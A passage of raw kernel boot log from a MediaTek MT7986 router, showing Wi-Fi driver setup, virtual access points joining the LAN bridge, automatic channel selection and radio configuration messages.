promiscuous mode [ 29.603714] br-lan: port 5(ra0) entered blocking state [ 29.603717] br-lan: port 5(ra0) entered forwarding state [ 29.604942] operate_loader_phy: vap ra1, (caller:wlan_operate_init+0xa4/0x120 [mt7986b]) [ 29.604950] 7986@C23L1ra0,operate_loader_phy() 385: oper_cfg: prim_ch(1), ht_bw(1), extcha(1), vht_bw(0), cen_ch_2(0), PhyMode=78! [ 29.604959] 7986@C23L1ra0,operate_loader_phy() 396: operate_loader_phy(): oper_dev after adjust: bw(1), prim_ch(1), cen_ch_1(3), cen_ch_2(0),ext_cha(1), vht_bw(0)! [ 29.604973] 7986@C00L1ra0,operate_loader_phy() 405: operate_loader_phy(): oper_radio after decision: bw(1), prim_ch(1), cen_ch_1(3), cen_ch_2(0), vht_bw(0)! [ 29.604976] hc_radio_res_request(): radio is equal, prim_ch=1, rx stream:4! [ 29.605002] WiFi@C12L1,wifi_sys_open() 898: wifi_sys_open():band0 group_idx[1]=9, bw_grp=16 omac=17 [ 29.607844] 7986@C03L1ra0,MtCmdSetMacTxRx() 10289: (ret = 0) [ 29.607957] 7986@C03L1ra0,MtCmdSetMacTxRx() 10289: (ret = 0) [ 29.607961] 7986@C00L1ra0,ApAutoChannelAtBootUp() 474: not A band [ 29.608151] Allocate ObjIdx:1 WmmIdx:0 [ 29.612441] 7986@C00L1ra0,TxCCKStreamCtrl() 21152: set wrong parameters [ 29.623297] PrintSrCmd: [ 29.623297] u1CmdSubId = 1, u1ArgNum = 0, u1DbdcIdx = 0, u1Status = 0 [ 29.623297] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 1 [ 29.623304] PrintSrCmd: [ 29.623304] u1CmdSubId = 5, u1ArgNum = 0, u1DbdcIdx = 0, u1Status = 0 [ 29.623304] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 0 [ 29.623311] PrintSrCmd: [ 29.623311] u1CmdSubId = 3, u1ArgNum = 0, u1DbdcIdx = 0, u1Status = 0 [ 29.623311] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 1 [ 29.623318] PrintSrCmd: [ 29.623318] u1CmdSubId = 23, u1ArgNum = 0, u1DbdcIdx = 0, u1Status = 0 [ 29.623318] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 1 [ 29.623324] PrintSrCmd: [ 29.623324] u1CmdSubId = 31, u1ArgNum = 0, u1DbdcIdx = 0, u1Status = 0 [ 29.623324] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 0 [ 29.623329] PrintSrCmd: [ 29.623329] u1CmdSubId = 33, u1ArgNum = 0, u1DbdcIdx = 0, u1Status = 0 [ 29.623329] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 0 [ 29.623358] mtk_ppe_dev_register_hook : ineterface ra1 register (3) [ 29.623618] br-lan: port 6(ra1) entered blocking state [ 29.623621] br-lan: port 6(ra1) entered disabled state [ 29.623714] device ra1 entered promiscuous mode [ 29.623751] br-lan: port 6(ra1) entered blocking state [ 29.623754] br-lan: port 6(ra1) entered forwarding state [ 29.624249] [mtf_txpower_all_rate_info] band_idx:0 pwr:54 ChBand:2G ePAGain:0 [ 29.624968] operate_loader_phy: vap ra7, (caller:wlan_operate_init+0xa4/0x120 [mt7986b]) [ 29.624976] 7986@C23L1ra0,operate_loader_phy() 385: oper_cfg: prim_ch(1), ht_bw(1), extcha(1), vht_bw(0), cen_ch_2(0), PhyMode=78! [ 29.624985] 7986@C23L1ra0,operate_loader_phy() 396: operate_loader_phy(): oper_dev after adjust: bw(1), prim_ch(1), cen_ch_1(3), cen_ch_2(0),ext_cha(1), vht_bw(0)! [ 29.625000] 7986@C00L1ra0,operate_loader_phy() 405: operate_loader_phy(): oper_radio after decision: bw(1), prim_ch(1), cen_ch_1(3), cen_ch_2(0), vht_bw(0)! [ 29.625003] hc_radio_res_request(): radio is equal, prim_ch=1, rx stream:4! [ 29.625027] WiFi@C12L1,wifi_sys_open() 898: wifi_sys_open():band0 group_idx[7]=10, bw_grp=16 omac=18 [ 29.627870] 7986@C03L1ra0,MtCmdSetMacTxRx() 10289: (ret = 0) [ 29.627984] 7986@C03L1ra0,MtCmdSetMacTxRx() 10289: (ret = 0) [ 29.627987] 7986@C00L1ra0,ApAutoChannelAtBootUp() 474: not A band [ 29.628228] Allocate ObjIdx:7 WmmIdx:0 [ 29.632362] 7986@C00L1ra0,TxCCKStreamCtrl() 21152: set wrong parameters [ 29.643451] PrintSrCmd: [ 29.643451] u1CmdSubId = 1, u1ArgNum = 0, u1DbdcIdx = 0, u1Status = 0 [ 29.643451] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 1 [ 29.643460] PrintSrCmd: [ 29.643460] u1CmdSubId = 5, u1ArgNum = 0, u1DbdcIdx = 0, u1Status = 0 [ 29.643460] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 0 [ 29.643467] PrintSrCmd: [ 29.643467] u1CmdSubId = 3, u1ArgNum = 0, u1DbdcIdx = 0, u1Status = 0 [ 29.643467] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 1 [ 29.643473] PrintSrCmd: [ 29.643473] u1CmdSubId = 23, u1ArgNum = 0, u1DbdcIdx = 0, u1Status = 0 [ 29.643473] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 1 [ 29.643479] PrintSrCmd: [ 29.643479] u1CmdSubId = 31, u1ArgNum = 0, u1DbdcIdx = 0, u1Status = 0 [ 29.643479] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 0 [ 29.643485] PrintSrCmd: [ 29.643485] u1CmdSubId = 33, u1ArgNum = 0, u1DbdcIdx = 0, u1Status = 0 [ 29.643485] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 0 [ 29.643513] mtk_ppe_dev_register_hook : ineterface ra7 register (4) [ 29.643753] br-lan: port 7(ra7) entered blocking state [ 29.643756] br-lan: port 7(ra7) entered disabled state [ 29.643850] device ra7 entered promiscuous mode [ 29.643883] br-lan: port 7(ra7) entered blocking state [ 29.643886] br-lan: port 7(ra7) entered forwarding state [ 29.644392] [mtf_txpower_all_rate_info] band_idx:0 pwr:54 ChBand:2G ePAGain:0 [ 29.645108] operate_loader_phy: vap apcli0, (caller:wlan_operate_init+0xa4/0x120 [mt7986b]) [ 29.645116] 7986@C23L1ra0,operate_loader_phy() 385: oper_cfg: prim_ch(1), ht_bw(1), extcha(1), vht_bw(0), cen_ch_2(0), PhyMode=78! [ 29.645125] 7986@C23L1ra0,operate_loader_phy() 396: operate_loader_phy(): oper_dev after adjust: bw(1), prim_ch(1), cen_ch_1(3), cen_ch_2(0),ext_cha(1), vht_bw(0)! [ 29.645140] 7986@C00L1ra0,operate_loader_phy() 405: operate_loader_phy(): oper_radio after decision: bw(1), prim_ch(1), cen_ch_1(3), cen_ch_2(0), vht_bw(0)! [ 29.645143] hc_radio_res_request(): radio is equal, prim_ch=1, rx stream:4! [ 29.647404] mtk_ppe_dev_register_hook : ineterface apcli0 register (5) [ 29.647670] br-lan: port 8(apcli0) entered blocking state [ 29.647673] br-lan: port 8(apcli0) entered disabled state [ 29.647769] device apcli0 entered promiscuous mode [ 29.648769] br-lan: port 9(rax0) entered blocking state [ 29.648772] br-lan: port 9(rax0) entered disabled state [ 29.648844] device rax0 entered promiscuous mode [ 29.648868] br-lan: port 9(rax0) entered blocking state [ 29.648871] br-lan: port 9(rax0) entered forwarding state [ 29.650097] operate_loader_phy: vap rax7, (caller:wlan_operate_init+0xa4/0x120 [mt7986b]) [ 29.650107] 7986@C23L1rax0,operate_loader_phy() 385: oper_cfg: prim_ch(36), ht_bw(1), extcha(1), vht_bw(0), cen_ch_2(0), PhyMode=177! [ 29.650114] 7986@C23L1rax0,operate_loader_phy() 396: operate_loader_phy(): oper_dev after adjust: bw(1), prim_ch(36), cen_ch_1(38), cen_ch_2(0),ext_cha(1), vht_bw(0)! [ 29.650131] 7986@C00L1rax0,operate_loader_phy() 405: operate_loader_phy(): oper_radio after decision: bw(1), prim_ch(36), cen_ch_1(38), cen_ch_2(0), vht_bw(0)! [ 29.650135] hc_radio_res_request(): radio is equal, prim_ch=36, rx stream:4! [ 29.650140] 7986@C23L1rax0,DfsCacNormalStart() 3946: DfsCacNormalStart: CAC Start, band_idx=1. [ 29.650170] WiFi@C12L1,wifi_sys_open() 898: wifi_sys_open():band1 group_idx[15]=25, bw_grp=16 omac=17 [ 29.653934] 7986@C03L1rax0,MtCmdSetMacTxRx() 10289: (ret = 0) [ 29.654047] 7986@C03L1rax0,MtCmdSetMacTxRx() 10289: (ret = 0) [ 29.654051] 7986@C00L1rax0,ApAutoChannelAtBootUp() 468: zero-wait DFS is not enabled [ 29.654253] Allocate ObjIdx:15 WmmIdx:1 [ 29.669593] PrintSrCmd: [ 29.669593] u1CmdSubId = 1, u1ArgNum = 0, u1DbdcIdx = 1, u1Status = 0 [ 29.669593] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 1 [ 29.669602] PrintSrCmd: [ 29.669602] u1CmdSubId = 5, u1ArgNum = 0, u1DbdcIdx = 1, u1Status = 0 [ 29.669602] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 0 [ 29.669609] PrintSrCmd: [ 29.669609] u1CmdSubId = 3, u1ArgNum = 0, u1DbdcIdx = 1, u1Status = 0 [ 29.669609] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 1 [ 29.669615] PrintSrCmd: [ 29.669615] u1CmdSubId = 23, u1ArgNum = 0, u1DbdcIdx = 1, u1Status = 0 [ 29.669615] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 1 [ 29.669621] PrintSrCmd: [ 29.669621] u1CmdSubId = 31, u1ArgNum = 0, u1DbdcIdx = 1, u1Status = 0 [ 29.669621] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 0 [ 29.669627] PrintSrCmd: [ 29.669627] u1CmdSubId = 33, u1ArgNum = 0, u1DbdcIdx = 1, u1Status = 0 [ 29.669627] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 0 [ 29.669658] mtk_ppe_dev_register_hook : ineterface rax7 register (6) [ 29.669952] br-lan: port 10(rax7) entered blocking state [ 29.669956] br-lan: port 10(rax7) entered disabled state [ 29.670059] device rax7 entered promiscuous mode [ 29.670094] br-lan: port 10(rax7) entered blocking state [ 29.670097] br-lan: port 10(rax7) entered forwarding state [ 29.670543] [mtf_txpower_all_rate_info] band_idx:1 pwr:53 ChBand:5G ePAGain:0 [ 29.671338] operate_loader_phy: vap apclix0, (caller:wlan_operate_init+0xa4/0x120 [mt7986b]) [ 29.671347] 7986@C23L1rax0,operate_loader_phy() 385: oper_cfg: prim_ch(36), ht_bw(1), extcha(1), vht_bw(0), cen_ch_2(0), PhyMode=177! [ 29.671354] 7986@C23L1rax0,operate_loader_phy() 396: operate_loader_phy(): oper_dev after adjust: bw(1), prim_ch(36), cen_ch_1(38), cen_ch_2(0),ext_cha(1), vht_bw(0)! [ 29.671372] 7986@C00L1rax0,operate_loader_phy() 405: operate_loader_phy(): oper_radio after decision: bw(1), prim_ch(36), cen_ch_1(38), cen_ch_2(0), vht_bw(0)! [ 29.671377] hc_radio_res_request(): radio is equal, prim_ch=36, rx stream:4! [ 29.671382] 7986@C23L1rax0,DfsCacNormalStart() 3946: DfsCacNormalStart: CAC Start, band_idx=1. [ 29.674670] mtk_ppe_dev_register_hook : ineterface apclix0 register (7) [ 29.674822] br-lan: port 11(apclix0) entered blocking state [ 29.674825] br-lan: port 11(apclix0) entered disabled state [ 29.674925] device apclix0 entered promiscuous mode [ 29.674962] br-lan: port 11(apclix0) entered blocking state [ 29.674965] br-lan: port 11(apclix0) entered forwarding state [ 29.675951] 7986@C12L1ra0,RTMPAPPrivIoctlSet() 3940: IOCTL::(iwpriv) Command not Support [SetAlmac=EC:60:73:C5:40:EC] [ 29.676021] 7986@C12L1rax0,RTMPAPPrivIoctlSet() 3940: IOCTL::(iwpriv) Command not Support [SetAlmac=EC:60:73:C5:40:EC] [ 29.676741] gpio 11 request success. [ 29.694643] tpRadius_netlink_receive Get Pid(1389) from radius app with message : HELLO [ 29.722549] gpio 10 request success. [ 29.853814] Game APP Accel module init... [ 29.853982] Registered character driver game_app_accel_chrdev [ 29.859557] device ra1 left promiscuous mode [ 29.859608] br-lan: port 6(ra1) entered disabled state [ 29.905982] br_guest_filter: module license 'BSD' taints kernel. [ 29.905986] Disabling lock debugging due to kernel taint [ 29.906267] guest ifindex < 0. [ 29.906283] [info]: br_guest_filter module installed. [ 30.653891] br-lan: port 11(apclix0) entered disabled state [ 30.911193] 7986@C09L1ra0,ApCliIfDown() 2100: [MESH_SR]ApCliIfDown - ApCli interface[0] start down & resume SR [ 30.911200] 7986@C09L1ra0,ApCliIfDown() 2100: [MESH_SR]ApCliIfDown - ApCli interface[1] start down & resume SR [ 30.914500] wmm_ctrl_release_entry(): ObjIdx=0,WmmIdx=0 [ 30.918845] wmm_ctrl_release_entry(): ObjIdx=1,WmmIdx=0 [ 30.919409] 7986@C08L0ra0,a4_interface_deinit() 155: a4_interface_init a4_interface_count: 1 [ 30.922940] wmm_ctrl_release_entry(): ObjIdx=7,WmmIdx=0 [ 30.923794] 7986@C23L1ra0,Set_Channel_Proc() 1796: Channel(0), Cert(0), Quick(1) [ 30.923997] 7986@C23L1ra0,rtmp_set_channel() 3007: (caller:Set_Channel_Proc+0x180/0x4f8 [mt7986b]), Channel(0), quick_ch_change:1. [ 30.924002] 7986@C12L1ra0,rtmp_set_channel() 3032: rtmp_set_channel: return by pDot11h=NULL [ 30.924035] Set_Channel_Proc: successfully update channel to 0 [ 30.924115] [mtf_txpower_all_rate_info] band_idx:0 pwr:54 ChBand:2G ePAGain:0 [ 30.924159] MtCmdSetMuruCfgDlUlVal: u1BandBssSelect:0 u1Index:0 ParamUpdList:4 ParamUpdVal:4 [ 30.924209] MtCmdSetMuruCfgDlUlVal: u1BandBssSelect:0 u1Index:0 ParamUpdList:3 ParamUpdVal:0 [ 30.929458] [wps]wpsImple_SetWpsInProgress_Proc: IF-ra00 trigger wps mode from 0 to 0. [ 30.945837] [wps]wpsImple_SetWpsInProgress_Proc: IF-ra08 trigger wps mode from 0 to 0. [ 30.958237] device ra0 left promiscuous mode [ 30.958287] br-lan: port 5(ra0) entered disabled state [ 30.985511] 7986@C08L1ra0,UpdateBeaconHandler() 2060: wdev(0) bss not ready (state:0, caller:ioctlStopVap+0xec/0x190 [mt7986b])!! [ 30.985654] 7986@C15L1ra0,Set_PMFMFPC_Proc() 1722: [PMF] :: apidx=0, Desired MFPC=0 [ 30.985921] Disable vap 0 rate limit [ 30.985924] IF(ra0) Set_BWRateLimitType_Proc::(iv_ml_type_bw=0) [ 30.986079] Set_FragThreshold_Proc::set wdev0 FragThreshold=2346) [ 30.986099] Set_RTSThreshold_Proc: set wdev0 rts length threshold=2347(0x92b) [ 30.988409] Set_MgntFrameRate_Proc::(MgntFrameRate For EAPOL|ARP|DHCP ERROR) [ 30.988723] 7986@C08L1ra0,UpdateBeaconHandler() 2060: wdev(0) bss not ready (state:0, caller:APStopByBss+0xe8/0x410 [mt7986b])!! [ 30.989219] operate_loader_phy: vap ra0, (caller:wlan_operate_init+0xa4/0x120 [mt7986b]) [ 30.989226] 7986@C23L1ra0,operate_loader_phy() 385: oper_cfg: prim_ch(0), ht_bw(1), extcha(1), vht_bw(0), cen_ch_2(0), PhyMode=78! [ 30.989251] WiFi@C12L1,wifi_sys_open() 898: wifi_sys_open():band0 group_idx[0]=0, bw_grp=16 omac=0 [ 30.991495] 7986@C23L1ra0,HcGetBandByChannel() 1102: No hdev parking on channel:0, just return a default band_idx 0! [ 30.992137] 7986@C03L1ra0,MtCmdSetMacTxRx() 10289: (ret = 0) [ 30.992249] 7986@C03L1ra0,MtCmdSetMacTxRx() 10289: (ret = 0) [ 30.992395] 7986@C08L1ra0,UpdateBeaconHandler() 2060: wdev(0) bss not ready (state:0, caller:MTAPAutoSelectChannel+0x108/0x490 [mt7986b])!! [ 31.019670] WiFi@C00L1,RcUpdateChannel() 882: RcUpdateChannel: pRadioCtrl→Channel, orig_chan=1, new_chan=1 [ 31.162232] 7986@C08L1ra0,UpdateBeaconHandler() 2060: wdev(0) bss not ready (state:0, caller:ApUpdateCapabilityAndErpIe+0x2fc/0x4e0 [mt7986b])!! [ 31.253357] WiFi@C00L1,RcUpdateChannel() 882: RcUpdateChannel: pRadioCtrl→Channel, orig_chan=1, new_chan=6 [ 31.485298] WiFi@C00L1,RcUpdateChannel() 882: RcUpdateChannel: pRadioCtrl→Channel, orig_chan=6, new_chan=11 [ 31.690165] 7986@C08L1ra0,UpdateBeaconHandler() 2060: wdev(0) bss not ready (state:0, caller:MTAPAutoSelectChannel+0x2d0/0x490 [mt7986b])!! [ 31.690182] 7986@C00L0ra0,ApAutoChannelAtBootUp() 358: Auto channel selection: Selected channel = 6, IsAband = 0 [ 31.690312] operate_loader_phy: vap ra0, (caller:wlan_operate_set_prim_ch+0x3c/0x50 [mt7986b]) [ 31.690318] 7986@C23L1ra0,operate_loader_phy() 385: oper_cfg: prim_ch(6), ht_bw(1), extcha(1), vht_bw(0), cen_ch_2(0), PhyMode=78! [ 31.690327] 7986@C23L1ra0,operate_loader_phy() 396: operate_loader_phy(): oper_dev after adjust: bw(1), prim_ch(6), cen_ch_1(4), cen_ch_2(0),ext_cha(3), vht_bw(0)! [ 31.690341] 7986@C00L1ra0,operate_loader_phy() 405: operate_loader_phy(): oper_radio after decision: bw(1), prim_ch(6), cen_ch_1(4), cen_ch_2(0), vht_bw(0)! [ 31.901692] WiFi@C00L1,RcUpdateChannel() 882: RcUpdateChannel: pRadioCtrl→Channel, orig_chan=11, new_chan=6 [ 31.901708] 7986@C23L1ra0,DfsBuildChannelList() 4073: [RDM]: wdev is not 5G. [ 31.901709] ApAutoChannelAtBootUp←---------------- [ 31.901950] 7986@C08L1ra0,UpdateBeaconHandler() 2060: wdev(0) bss not ready (state:0, caller:MlmeUpdateTxRates+0x7c/0xef8 [mt7986b])!! [ 31.948684] Allocate ObjIdx:0 WmmIdx:0 [ 31.952179] 7986@C00L1ra0,TxCCKStreamCtrl() 21152: set wrong parameters [ 31.962983] PrintSrCmd: [ 31.962983] u1CmdSubId = 1, u1ArgNum = 0, u1DbdcIdx = 0, u1Status = 0 [ 31.962983] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 1 [ 31.962990] PrintSrCmd: [ 31.962990] u1CmdSubId = 5, u1ArgNum = 0, u1DbdcIdx = 0, u1Status = 0 [ 31.962990] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 0 [ 31.962998] PrintSrCmd: [ 31.962998] u1CmdSubId = 3, u1ArgNum = 0, u1DbdcIdx = 0, u1Status = 0 [ 31.962998] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 1 [ 31.963004] PrintSrCmd: [ 31.963004] u1CmdSubId = 23, u1ArgNum = 0, u1DbdcIdx = 0, u1Status = 0 [ 31.963004] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 1 [ 31.963010] PrintSrCmd: [ 31.963010] u1CmdSubId = 31, u1ArgNum = 0, u1DbdcIdx = 0, u1Status = 0 [ 31.963010] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 0 [ 31.963016] PrintSrCmd: [ 31.963016] u1CmdSubId = 33, u1ArgNum = 0, u1DbdcIdx = 0, u1Status = 0 [ 31.963016] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 0 [ 31.963051] Main bssid = ec:60:73:c5:40:ec [ 31.963104] br-lan: port 5(ra0) entered blocking state [ 31.963107] br-lan: port 5(ra0) entered disabled state [ 31.963233] device ra0 entered promiscuous mode [ 31.963263] br-lan: port 5(ra0) entered blocking state [ 31.963266] br-lan: port 5(ra0) entered forwarding state [ 31.963956] [mtf_txpower_all_rate_info] band_idx:0 pwr:54 ChBand:2G ePAGain:0 [ 31.964684] 7986@C08L1ra1,UpdateBeaconHandler() 2060: wdev(1) bss not ready (state:0, caller:ioctlStopVap+0xec/0x190 [mt7986b])!! [ 31.965477] 7986@C15L1ra1,Set_PMFMFPC_Proc() 1722: [PMF] :: apidx=1, Desired MFPC=0 [ 31.965845] Disable vap 1 rate limit [ 31.965850] IF(ra1) Set_BWRateLimitType_Proc::(iv_ml_type_bw=0) [ 31.966023] Set_FragThreshold_Proc::set wdev1 FragThreshold=2346) [ 31.966047] Set_RTSThreshold_Proc: set wdev1 rts length threshold=2347(0x92b) [ 31.968610] Set_MgntFrameRate_Proc::(MgntFrameRate For EAPOL|ARP|DHCP ERROR) [ 31.968737] device ra7 left promiscuous mode [ 31.968791] br-lan: port 7(ra7) entered disabled state [ 31.999230] 7986@C08L1ra7,UpdateBeaconHandler() 2060: wdev(7) bss not ready (state:0, caller:ioctlStopVap+0xec/0x190 [mt7986b])!! [ 31.999388] 7986@C15L1ra7,Set_PMFMFPC_Proc() 1722: [PMF] :: apidx=7, Desired MFPC=0 [ 31.999555] Disable vap 7 rate limit [ 31.999558] IF(ra7) Set_BWRateLimitType_Proc::(iv_ml_type_bw=0) [ 31.999718] Set_FragThreshold_Proc::set wdev7 FragThreshold=2346) [ 31.999749] Set_RTSThreshold_Proc: set wdev7 rts length threshold=2347(0x92b) [ 32.002241] Set_MgntFrameRate_Proc::(MgntFrameRate For EAPOL|ARP|DHCP ERROR) [ 32.002639] 7986@C08L1ra7,UpdateBeaconHandler() 2060: wdev(7) bss not ready (state:0, caller:APStopByBss+0xe8/0x410 [mt7986b])!! [ 32.003177] operate_loader_phy: vap ra7, (caller:wlan_operate_init+0xa4/0x120 [mt7986b]) [ 32.003186] 7986@C23L1ra7,operate_loader_phy() 385: oper_cfg: prim_ch(6), ht_bw(1), extcha(1), vht_bw(0), cen_ch_2(0), PhyMode=78! [ 32.003196] 7986@C23L1ra7,operate_loader_phy() 396: operate_loader_phy(): oper_dev after adjust: bw(1), prim_ch(6), cen_ch_1(4), cen_ch_2(0),ext_cha(3), vht_bw(0)! [ 32.003213] 7986@C00L1ra7,operate_loader_phy() 405: operate_loader_phy(): oper_radio after decision: bw(1), prim_ch(6), cen_ch_1(4), cen_ch_2(0), vht_bw(0)! [ 32.003217] hc_radio_res_request(): radio is equal, prim_ch=6, rx stream:4! [ 32.003246] WiFi@C12L1,wifi_sys_open() 898: wifi_sys_open():band0 group_idx[7]=9, bw_grp=16 omac=17 [ 32.006113] 7986@C03L1ra7,MtCmdSetMacTxRx() 10289: (ret = 0) [ 32.006215] 7986@C03L1ra7,MtCmdSetMacTxRx() 10289: (ret = 0) [ 32.006220] 7986@C00L1ra7,ApAutoChannelAtBootUp() 474: not A band [ 32.006604] 7986@C08L1ra7,UpdateBeaconHandler() 2060: wdev(7) bss not ready (state:0, caller:MlmeUpdateTxRates+0x7c/0xef8 [mt7986b])!! [ 32.053814] Allocate ObjIdx:7 WmmIdx:0 [ 32.058213] 7986@C00L1ra7,TxCCKStreamCtrl() 21152: set wrong parameters [ 32.069178] PrintSrCmd: [ 32.069178] u1CmdSubId = 1, u1ArgNum = 0, u1DbdcIdx = 0, u1Status = 0 [ 32.069178] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 1 [ 32.069189] PrintSrCmd: [ 32.069189] u1CmdSubId = 5, u1ArgNum = 0, u1DbdcIdx = 0, u1Status = 0 [ 32.069189] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 0 [ 32.069205] PrintSrCmd: [ 32.069205] u1CmdSubId = 3, u1ArgNum = 0, u1DbdcIdx = 0, u1Status = 0 [ 32.069205] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 1 [ 32.069216] PrintSrCmd: [ 32.069216] u1CmdSubId = 23, u1ArgNum = 0, u1DbdcIdx = 0, u1Status = 0 [ 32.069216] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 1 [ 32.069227] PrintSrCmd: [ 32.069227] u1CmdSubId = 31, u1ArgNum = 0, u1DbdcIdx = 0, u1Status = 0 [ 32.069227] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 0 [ 32.069237] PrintSrCmd: [ 32.069237] u1CmdSubId = 33, u1ArgNum = 0, u1DbdcIdx = 0, u1Status = 0 [ 32.069237] u1DropTaIdx = 0, u1StaIdx = 0, u4Value = 0 [ 32.069313] Main bssid = ec:60:73:c5:40:ec [ 32.069479] br-lan: port 6(ra7) entered blocking state [ 32.069483] br-lan: port 6(ra7) entered disabled state [ 32.069613] device ra7 entered promiscuous mode [ 32.069650] br-lan: port 6(ra7) entered blocking state [ 32.069653] br-lan: port 6(ra7) entered forwarding state [ 32.070522] [mtf_txpower_all_rate_info] band_idx:0 pwr:54 ChBand:2G ePAGain:0 [ 32.070924] device apcli0 left promiscuous mode [ 32.070951] br-lan: port 8(apcli0) entered disabled state [ 32.094942] 7986@C09L1apcli0,ApCliIfDown() 2100: [MESH_SR]ApCliIfDown - ApCli interface[0] start down & resume SR [ 32.094949] 7986@C09L1apcli0,ApCliIfDown() 2100: [MESH_SR]ApCliIfDown - ApCli interface[1] start down & resume SR [ 32.095434] 7986@C12L1apcli0,Set_ApCliPMFMFPC_Proc() 2003: [PMF]: MFPC=0, MFPR=0, SHA256=0 [ 32.095459] 7986@C12L1apcli0,Set_ApCliPMFMFPR_Proc() 2067: [PMF]: MFPC=0, MFPR=0, SHA256=0 [ 32.095474] 7986@C08L0apcli0,a4_interface_deinit() 155: a4_interface_init a4_interface_count: 2 [ 32.095537] 7986@C09L1rax0,ApCliIfDown() 2100: [MESH_SR]ApCliIfDown - ApCli interface[0] start down & resume SR [ 32.095541] 7986@C09L1rax0,ApCliIfDown() 2100: [MESH_SR]ApCliIfDown - ApCli interface[1] start down & resume SR [ 32.098422] wmm_ctrl_release_entry(): ObjIdx=8,WmmIdx=1 [ 32.098860] 7986@C08L0rax0,a4_interface_deinit() 155: a4_interface_init a4_interface_count: 1 [ 32.102260] wmm_ctrl_release_entry(): ObjIdx=15,WmmIdx=1 [ 32.103253] 7986@C12L1rax0,Set_HtBw_Proc() 8309: Set_HtBw_Proc: set pAd→CommonCfg.DfsParameter.OutBandHtBw=1 (BW_40=1) [ 32.103444] 7986@C12L1rax0,Set_VhtBw_Proc() 9880: Set_VhtBw_Proc: set pAd→CommonCfg.DfsParameter.OutBandBw=2 (VHT_BW_80=1) [ 32.103658] operate_loader_phy: vap rax1, (caller:wlan_operate_set_ht_bw+0x90/0x178 [mt7986b]) [ 32.103664] 7986@C23L1rax0,operate_loader_phy() 385: oper_cfg: prim_ch(36), ht_bw(1), extcha(1), vht_bw(2), cen_ch_2(0), PhyMode=177! [ 32.103674] 7986@C23L1rax0,operate_loader_phy() 396: operate_loader_phy(): oper_dev after adjust: bw(3), prim_ch(36), cen_ch_1(50), cen_ch_2(0),ext_cha(1), vht_bw(2)! [ 32.103688] 7986@C00L1rax0,operate_loader_phy() 405: operate_loader_phy(): oper_radio after decision: bw(3), prim_ch(36), cen_ch_1(50), cen_ch_2(0), vht_bw(2)! [ 32.103693] WiFi@C02L1,hc_radio_res_request() 1418: wdev=9, hobj is not ready! [ 32.103867] operate_loader_phy: vap rax2, (caller:wlan_operate_set_ht_bw+0x90/0x178 [mt7986b]) [ 32.103872] 7986@C23L1rax0,operate_loader_phy() 385: oper_cfg: prim_ch(36), ht_bw(1), extcha(1), vht_bw(2), cen_ch_2(0), PhyMode=177! [ 32.103877] 7986@C23L1rax0,operate_loader_phy() 396: operate_loader_phy(): oper_dev after adjust: bw(3), prim_ch(36), cen_ch_1(50), cen_ch_2(0),ext_cha(1), vht_bw(2)! [ 32.103889] 7986@C00L1rax0,operate_loader_phy() 405: operate_loader_phy(): oper_radio after decision: bw(3), prim_ch(36), cen_ch_1(50), cen_ch_2(0), vht_bw(2)! [ 32.103893] WiFi@C02L1,hc_radio_res_request() 1418: wdev=10, hobj is not ready! [ 32.104012] operate_loader_phy: vap rax3, (caller:wlan_operate_set_ht_bw+0x90/0x178 [mt7986b]) [ 32.104017] 7986@C23L1rax0,operate_loader_phy() 385: oper_cfg: prim_ch(36), ht_bw(1), extcha(1), vht_bw(2), cen_ch_2(0), PhyMode=177! [ 32.104022] 7986@C23L1rax0,operate_loader_phy() 396: operate_loader_phy(): oper_dev after adjust: bw(3), prim_ch(36), cen_ch_1(50), cen_ch_2(0),ext_cha(1), vht_bw(2)! [ 32.104032] 7986@C00L1rax0,operate_loader_phy() 405: operate_loader_phy(): oper_radio after decision: bw(3), prim_ch(36), cen_ch_1(50), cen_ch_2(0), vht_bw(2)! [ 32.104035] WiFi@C02L1,hc_radio_res_request() 1418: wdev=11, hobj is not ready! [ 32.104136] operate_loader_phy: vap rax4, (caller:wlan_operate_set_ht_bw+0x90/0x178 [mt7986b]) [ 32.104141] 7986@C23L1rax0,operate_loader_phy() 385: oper_cfg: prim_ch(36), ht_bw(1), extcha(1), vht_bw(2), cen_ch_2(0), PhyMode=177! [ 32.104146] 7986@C23L1rax0,operate_loader_phy() 396: operate_loader_phy(): oper_dev after adjust: bw(3), prim_ch(36), cen_ch_1(50), cen_ch_2(0),ext_cha(1), vht_bw(2)! [ 32.104155] 7986@C00L1rax0,operate_loader_phy() 405: operate_loader_phy(): oper_radio after decision: bw(3), prim_ch(36), cen_ch_1(50), cen_ch_2(0), vht_bw(2)! [ 32.104158] WiFi@C02L1,hc_radio_res_request() 1418: wdev=12, hobj is not ready! [ 32.104253] operate_loader_phy: vap rax5, (caller:wlan_operate_set_ht_bw+0x90/0x178 [mt7986b]) [ 32.104257] 7986@C23L1rax0,operate_loader_phy() 385: oper_cfg: prim_ch(36), ht_bw(1), extcha(1), vht_bw(2), cen_ch_2(0), PhyMode=177! [ 32.104262] 7986@C23L1rax0,operate_loader_phy() 396: operate_loader_phy(): oper_dev after adjust: bw(3), 